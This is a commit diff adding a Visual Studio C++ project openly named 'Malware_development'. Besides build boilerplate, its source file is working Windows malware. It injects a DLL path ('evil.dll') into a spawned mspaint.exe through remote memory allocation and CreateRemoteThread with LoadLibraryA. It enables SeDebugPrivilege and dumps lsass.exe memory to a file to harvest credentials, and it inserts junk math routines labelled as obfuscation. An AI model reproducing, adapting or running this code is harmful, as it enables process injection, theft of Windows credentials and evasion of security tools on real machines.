Добавьте файлы проекта.

Author: User

Malware_development.sln

@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.33529.622
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Malware_development", "Malware_development\Malware_development.vcxproj", "{006AA719-5F50-4C14-84D9-88F7D8E077A9}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{006AA719-5F50-4C14-84D9-88F7D8E077A9}.Debug|x64.ActiveCfg = Debug|x64
+		{006AA719-5F50-4C14-84D9-88F7D8E077A9}.Debug|x64.Build.0 = Debug|x64
+		{006AA719-5F50-4C14-84D9-88F7D8E077A9}.Debug|x86.ActiveCfg = Debug|Win32
+		{006AA719-5F50-4C14-84D9-88F7D8E077A9}.Debug|x86.Build.0 = Debug|Win32
+		{006AA719-5F50-4C14-84D9-88F7D8E077A9}.Release|x64.ActiveCfg = Release|x64
+		{006AA719-5F50-4C14-84D9-88F7D8E077A9}.Release|x64.Build.0 = Release|x64
+		{006AA719-5F50-4C14-84D9-88F7D8E077A9}.Release|x86.ActiveCfg = Release|Win32
+		{006AA719-5F50-4C14-84D9-88F7D8E077A9}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {9858D780-EFC8-4AA2-816E-31C5FD3270AD}
+	EndGlobalSection
+EndGlobal

Malware_development/Malware_development.cpp

@@ -0,0 +1,180 @@
+#include <iostream>
+#include <windows.h>
+#include <stdio.h>
+#include <math.h>
+#include <string.h>
+#include <tlhelp32.h>
+#include <stdlib.h>
+#include <dbghelp.h>
+
+#pragma comment(lib, "ntdll")
+#pragma comment(lib, "dbghelp.lib")
+
+typedef NTSTATUS(NTAPI* pNtAllocateVirtualMmemory)(
+    HANDLE           ProcessHandle,
+    PVOID            *BaseAddress,
+    ULONG            ZeroBits,
+    PULONG           RegionSize,
+    ULONG            AllocationType,
+    ULONG            Protect
+);
+
+char maliciousLibraryPath[] = "evil.dll";
+unsigned int maliciousLibraryPathLength = sizeof(maliciousLibraryPath) + 1;
+
+// find a process and return its id
+int locateTargetProcess(const char* targetProcName) {
+    HANDLE hSnapshot;
+    PROCESSENTRY32 processEntry;
+    int pID = 0;
+    BOOL hResult;
+
+    // snapshot of all processes in the system
+    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+    if (INVALID_HANDLE_VALUE == hSnapshot) {
+        return 0;
+    }
+
+    //initializing size: needed for using Process32First
+    processEntry.dwSize = sizeof(PROCESSENTRY32);
+
+    // info about first process encountred in a system snapshot
+    hResult = Process32First(hSnapshot, &processEntry);
+
+    // retrieve information about the process
+    // and exit if unsecussful
+    size_t length = strlen(targetProcName) + 1;
+    wchar_t wProcName[100];
+    mbstowcs(wProcName, targetProcName, length);
+    while (hResult) {
+        // if we find the process: return process ID
+        if (wcscmp(wProcName, processEntry.szExeFile) == 0) {
+            pID = processEntry.th32ProcessID;
+            break;
+        }
+        hResult = Process32Next(hSnapshot, &processEntry);
+    }
+
+    CloseHandle(hSnapshot);
+    return pID;
+}
+
+// set privilege
+BOOL enablePrivilege(LPCTSTR privilegeName) {
+    HANDLE processToken;
+    TOKEN_PRIVILEGES tokenPrivileges;
+    LUID privilegeLUID;
+    BOOL result = TRUE;
+
+    if (!LookupPrivilegeValue(NULL, privilegeName, &privilegeLUID)) {
+        result = FALSE;
+    }
+    tokenPrivileges.PrivilegeCount = 1;
+    tokenPrivileges.Privileges[0].Luid = privilegeLUID;
+    tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+
+    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &processToken)) {
+        result = FALSE;
+    }
+    if (!AdjustTokenPrivileges(processToken, FALSE, &tokenPrivileges, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) {
+        result = FALSE;
+    }
+    return result;
+}
+
+// create minidump of lsass.exe
+BOOL generateMinDump() {
+    bool dumpSuccess = FALSE;
+    int processID = locateTargetProcess("lsass.exe");
+    HANDLE processHandle = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, 0, processID);
+    HANDLE outputHandle = CreateFile((LPCTSTR)"c:\\temp\\lsass.dmp", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (processHandle && outputHandle != INVALID_HANDLE_VALUE) {
+        dumpSuccess = MiniDumpWriteDump(processHandle, processID, outputHandle, (MINIDUMP_TYPE)0x00000002, NULL, NULL, NULL);
+    }
+    return dumpSuccess;
+}
+
+
+// obfuscation
+void MathOperations() {
+    volatile int x = 0;
+    x += 1;
+    x -= 1;
+    x *= 1;
+    x /= 1;
+
+    double y = 2.5;
+    double z = 3.7;
+    double result = 0.0;
+
+    for (int i = 0; i < 3; i++) {
+        result = sqrt(pow(y, 2) + pow(z, 2) + i);
+        result = sin(result);
+        result = cos(result);
+        result = tan(result);
+    }
+
+    for (int i = 0; i < 10; ++i) {
+        result *= i;
+        result /= i;
+        result += i;
+    }
+
+    if (result < 100) {
+        result -= 100;
+    } else{
+        result += 100;
+    }
+}
+
+int main(int argc, char* argv[]){
+    HANDLE targetProcess; 
+    HANDLE remoteThread;
+    LPVOID remoteBuffer;
+
+    // Obtain handles to kernel32 and ntdll and retrieve function pointer
+    HMODULE ntdllHandle = GetModuleHandle(L"ntdll");
+    HMODULE kernel32Handle = GetModuleHandle(L"Kernel32");
+    VOID* loadLibraryFunction = (VOID*)GetProcAddress(kernel32Handle, "LoadLibraryA");
+
+    STARTUPINFOA si;
+    PROCESS_INFORMATION pi;
+    ZeroMemory(&si, sizeof(STARTUPINFOA));
+    si.cb = sizeof(STARTUPINFOA);
+    const char* process = "mspaint.exe";
+    CreateProcessA(NULL, (LPSTR)process, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
+    int pid = -1;
+    pid = locateTargetProcess(process);
+
+    MathOperations();
+    
+    // Parse process ID
+    if (pid <= 0) {
+        return -1;
+    }
+    targetProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)pid);
+    
+    pNtAllocateVirtualMmemory myNtAllocateVirtualMemory = (pNtAllocateVirtualMmemory)GetProcAddress(ntdllHandle, "NtAllocateVirtualMemory");
+
+    // Allocate memory buffer in the remote process
+    myNtAllocateVirtualMemory(targetProcess, &remoteBuffer, 0, (PULONG)&maliciousLibraryPathLength, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+
+    // Copy the malicious DLL path to the remote process
+    WriteProcessMemory(targetProcess, remoteBuffer, maliciousLibraryPath, maliciousLibraryPathLength, NULL);
+
+    // Start a new thread in the target process
+    remoteThread = CreateRemoteThread(targetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)loadLibraryFunction, remoteBuffer, 0, NULL);
+    CloseHandle(targetProcess);
+
+    MathOperations();
+
+    if (!enablePrivilege(SE_DEBUG_NAME)) {
+        return -1;
+    }
+    if (!generateMinDump()) {
+        return -1;
+    }
+    return 0;
+
+}
+

Malware_development/Malware_development.vcxproj

@@ -0,0 +1,147 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{006aa719-5f50-4c14-84d9-88f7d8e077a9}</ProjectGuid>
+    <RootNamespace>Malwaredevelopment</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="Malware_development.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

Malware_development/Malware_development.vcxproj.filters

@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Исходные файлы">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Файлы заголовков">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="Файлы ресурсов">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="Malware_development.cpp">
+      <Filter>Исходные файлы</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>